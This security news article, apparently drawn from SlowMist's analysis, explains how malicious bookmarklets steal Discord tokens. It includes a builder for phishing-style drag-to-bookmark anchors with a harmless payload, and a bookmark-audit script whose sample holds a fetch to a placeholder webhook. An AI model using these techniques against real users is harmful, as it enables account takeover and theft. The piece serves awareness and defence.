In recent years, the rapid growth of blockchain technology has given rise to many platforms. Among them, Discord, with its flexible settings and versatility, has become an important communication hub for the cryptocurrency, NFT and decentralized application (DApp) communities, attracting users who track airdrop announcements and early investment opportunities. But opportunity and risk coexist: scammers use Discord to defraud users and steal funds and personal information through social engineering and phishing, making Discord a place where investment opportunities and potential risks sit side by side.
Today (9/4), the founder of the security firm SlowMist forwarded a post showing how attackers lure users into adding a malicious browser bookmark and use it to steal the user's "Discord Token" (the authentication token Discord issues to a logged-in session; whoever holds it can act as the account without knowing the password), giving the attacker control of the account.
As of 2024, Discord Token theft incidents continue to grow. According to the report, Discord security incidents increased by 140% over the past year, with token theft the main problem. In another notable incident, attackers stole private information through Gnus.AI's Discord channel and then exploited a minting vulnerability, causing losses of US$1.27 million.
Common Discord Token attack methods:
- Malware and Token-stealing tools: Malware such as BlackPlague and Blitzed Grabber is built specifically to steal Discord Tokens. Once the token is stolen, the attacker bypasses password verification entirely and logs straight into the account to perform malicious operations.
- Server takeover: After obtaining a server administrator's token, attackers cause extensive damage to the server, including changing settings, deleting channels and banning members.
- Webhook abuse: Attackers use Discord's webhook feature as a remote-control and exfiltration channel, using webhooks to deliver malicious messages or to receive stolen sensitive information.
- Third-party service breaches: In August 2023, the third-party service Discord.io was hacked and the personal information of about 760,000 users was leaked, further compounding Discord-related security risks.
This time, we use SlowMist's analysis to explain the weaknesses around the Discord Token to readers, and to show how attackers use malicious browser bookmarks to steal users' Discord Tokens.
Phishing with malicious browser bookmarks to steal Discord Tokens
Rewinding to 2022, a post on X reported that the Discord server of the NFT project Wizard Pass had been hacked, resulting in BAYC, Doodles, Clone X and other NFTs being stolen.
After the post came out, someone replied underneath it:
The reply stated: "A bookmark is a browser bookmark (for example in Google Chrome). The content of the bookmark can contain JavaScript code. When the Discord user clicks on it, the malicious program is executed on Discord and steals the token. After the hacker obtains the token, they can easily control the project's Discord account and permissions."
SlowMist's practical breakdown of the case
To build this, all you need is an `<a>` tag whose href is a `javascript:` URL; the phishing page then asks the visitor to drag that link onto the bookmarks bar. Here is sample code:
When the bookmark is clicked, the script runs inside whatever page is currently open (here, the Discord web app), with that page's origin, so it can read the page's DOM, localStorage and in-memory modules. Because browsers treat a bookmarklet as a user-initiated script, it is deliberately exempt from the page's Content Security Policy, so Discord's CSP does not block it.
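As an added illustration (this is not SlowMist's sample code, which is not reproduced here), the following Node.js script builds the kind of `<a>` tag a phishing page would show next to a "drag this to your bookmarks bar" prompt. The payload is a harmless `alert`; the label "Claim airdrop" and the helper names are this example's own.

```javascript
// Added example, not SlowMist's sample: how a phishing page packages a script as a
// draggable bookmarklet. The payload is a harmless alert; the label is made up.

// Wrap the script as a bookmarklet. The IIFE keeps its variables off the page's
// global scope, and the trailing `void 0` makes the whole expression evaluate to
// undefined: if a javascript: URL evaluates to a string, the browser replaces the
// page with that string, which would make the victim notice that something happened.
function makeBookmarklet(script) {
  return "javascript:(function(){" + script + "})();void 0";
}

// Escape a value for use inside a double-quoted HTML attribute.
function escapeAttr(s) {
  return s.replace(/&/g, "&amp;").replace(/"/g, "&quot;")
          .replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

// The <a> tag the phishing page shows next to "drag this to your bookmarks bar".
// When dragged, Chrome stores the href verbatim as the bookmark URL with no prompt
// (Firefox asks for confirmation, as the comparison below shows).
function bookmarkAnchor(label, script) {
  return '<a href="' + escapeAttr(makeBookmarklet(script)) + '">' + escapeAttr(label) + "</a>";
}

// Harmless demo payload: shows which page the bookmarklet ran on.
const DEMO_SCRIPT = "alert('bookmarklet ran on ' + location.origin)";

if (typeof require !== "undefined" && require.main === module) {
  console.log(bookmarkAnchor("Claim airdrop", DEMO_SCRIPT));
}
```

Run it with `node` and paste the printed anchor into an HTML file: dragging the link onto Chrome's bookmarks bar is accepted silently, and clicking the bookmark while any site is open reports that site's origin, which is exactly the position a token-stealing payload would run from.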
Comparing Google Chrome and Firefox
Readers may wonder why the browser gives no warning when a link of the form "javascript:..." is added to the bookmarks bar.
SlowMist compares Google Chrome and Firefox.
Take Google Chrome as an example
On the left, a normal URL is dragged to the bookmarks bar; Chrome adds it without showing any editing prompt.
On the right, a malicious javascript: URL is dragged; Chrome adds it without any prompt either.
What about Firefox?
On the left, a normal URL is dragged, just as in Chrome, and no editing prompt appears.
On the right, when a malicious javascript: URL is dragged, Firefox pops up a dialog asking the user to confirm.
So Firefox is the safer of the two when it comes to adding bookmarks, though the prompt only helps if the user reads it rather than clicking through.
SlowMist uses Google Chrome for the demonstration. Assume the user is logged into the Discord web app and, guided by a phishing site, has added the malicious bookmark.
When they click the bookmark, the malicious code runs, and the user's Token and other personal information are sent to a channel on the attacker's server through a Discord webhook the attacker set up.
Details of the attack that may raise questions
- Why is one click enough to compromise the victim?
A bookmark can carry an arbitrary piece of JavaScript, and once clicked that script runs as part of the open page and can do almost anything, including pulling information out of Discord's front-end code through the webpackChunkdiscord_app module loader. To avoid enabling abuse, the team does not publish the detailed exploit code.
- Why would an attacker choose a Discord webhook to receive the data?
Because a webhook has the form https://discord.com/api/webhooks/xxxxxx, on Discord's own main domain. The exfiltration request is therefore same-origin with the page the script is running in, so the same-origin policy and CORS never get in the way, and on the wire it is just another request to discord.com. Readers can create a Discord webhook to test this.
- What can you do after getting the Token?
Holding the Token is equivalent to being logged into the Discord account: the holder can do anything the user can, such as creating webhooks or bots, or publishing announcements and fake news in the server's channels to phish its members.
Victims are advised to take the following remedial actions immediately:
- Reset your Discord account password immediately. Changing the password invalidates the existing token, so the copy in the attacker's hands stops working.
- Log in to Discord again after the reset so that your session gets a fresh token, and check the Devices page in User Settings for sessions you do not recognise. Note that two-factor authentication does not protect against this attack on its own: a stolen token is an already-authenticated session, so no 2FA prompt is ever shown.
- Delete and replace the original webhook links, because the old ones have been exposed.
- Improve security awareness: review your bookmarks for suspicious entries, in particular any whose URL begins with javascript:, and delete malicious ones that have been added.
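As an added example that is not part of the original article, here is a Node.js audit for the bookmark check in the last step. It reads Chrome's Bookmarks file (a JSON tree of `roots`, folders and `url` nodes; on Windows it lives at `%LOCALAPPDATA%\Google\Chrome\User Data\Default\Bookmarks`, on macOS under `~/Library/Application Support/Google/Chrome/Default/`, on Linux under `~/.config/google-chrome/Default/`), flags every bookmark whose URL is a `javascript:` URL, and additionally notes whether the script references a Discord webhook endpoint, the exfiltration channel used in this campaign. The document embedded in the script is a constructed sample in Chrome's layout; the webhook path in it is a placeholder, not a real hook.

```javascript
// Added example, not SlowMist's code: audit a Chrome "Bookmarks" JSON file for bookmarklets.

// A bookmark whose URL has the javascript: scheme is a script, not a link.
// Browsers ignore leading whitespace/control characters and the case of the
// scheme, so the check must as well, or "  JavaScript:..." slips past it.
function isScriptUrl(url) {
  return /^[\s\x00-\x1f]*javascript:/i.test(url || "");
}

// Percent-decode defensively; a malformed sequence must not crash the audit.
function safeDecode(s) {
  try { return decodeURIComponent(s); } catch (e) { return s; }
}

// Campaign-specific signal: the script posts to a Discord webhook, which is
// same-origin with the Discord web app and therefore unremarkable in traffic.
function mentionsDiscordWebhook(url) {
  return /discord(?:app)?\.com\/api\/webhooks\//i.test(safeDecode(url || ""));
}

// Walk a Chrome bookmark folder tree, returning every url node with its folder path.
function collectUrls(node, folders) {
  if (!node) return [];
  if (node.type === "url") {
    return [{ path: folders.join("/"), name: node.name, url: node.url }];
  }
  const here = folders.concat(node.name || "");
  return (node.children || []).flatMap(child => collectUrls(child, here));
}

// Chrome keeps three roots: the bookmarks bar, "Other bookmarks" and mobile ("synced").
function auditBookmarks(doc) {
  const roots = (doc && doc.roots) || {};
  const all = ["bookmark_bar", "other", "synced"].flatMap(k => collectUrls(roots[k], []));
  return all
    .filter(b => isScriptUrl(b.url))
    .map(b => Object.assign({}, b, { discordWebhook: mentionsDiscordWebhook(b.url) }));
}

// Audit a real Bookmarks file from disk (copy it first; Chrome keeps it open).
function auditFile(path) {
  const fs = require("fs");
  return auditBookmarks(JSON.parse(fs.readFileSync(path, "utf8")));
}

// Constructed sample in Chrome's layout. The webhook path is a placeholder, not a real hook.
const SAMPLE = {
  roots: {
    bookmark_bar: { type: "folder", name: "Bookmarks bar", children: [
      { type: "url", name: "Discord", url: "https://discord.com/app" },
      { type: "url", name: "Verify wallet",
        url: "  JavaScript:void fetch('https://discord.com/api/webhooks/0/placeholder',{method:'POST'})" },
    ] },
    other: { type: "folder", name: "Other bookmarks", children: [
      { type: "url", name: "Docs", url: "https://example.org/docs" },
      { type: "url", name: "Dark mode", url: "javascript:document.body.classList.toggle('dark');void 0" },
    ] },
  },
};

if (typeof require !== "undefined" && require.main === module) {
  const findings = process.argv[2] ? auditFile(process.argv[2]) : auditBookmarks(SAMPLE);
  for (const f of findings) {
    console.log((f.discordWebhook ? "[exfil->discord webhook] " : "[bookmarklet] ") +
      f.path + " / " + f.name + " : " + f.url.slice(0, 80));
  }
}
```

Run it with no argument to audit the embedded sample, or with a path to a copy of your own Bookmarks file. The audit deliberately reports every bookmarklet, including the harmless "Dark mode" one, because the name Chrome shows on the bar says nothing about what the URL does; the webhook flag only tells you which entries to look at first.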
Readers interested in SlowMist's approach to blockchain phishing scams and other information security issues, and who want to start from the technical side, can refer to SlowMist's "Blockchain Dark Forest Self-Rescue Manual".
We must also remain vigilant and be cautious about running or adding any code or unsolicited link. Many things on the internet look convenient and useful, but unlike an extension, a bookmarklet goes through no store review and asks for no permissions: every time you click it, it runs with the full privileges of whatever page is open. Treat each bookmarklet as code you are choosing to execute by hand, and think before every click to avoid being hacked.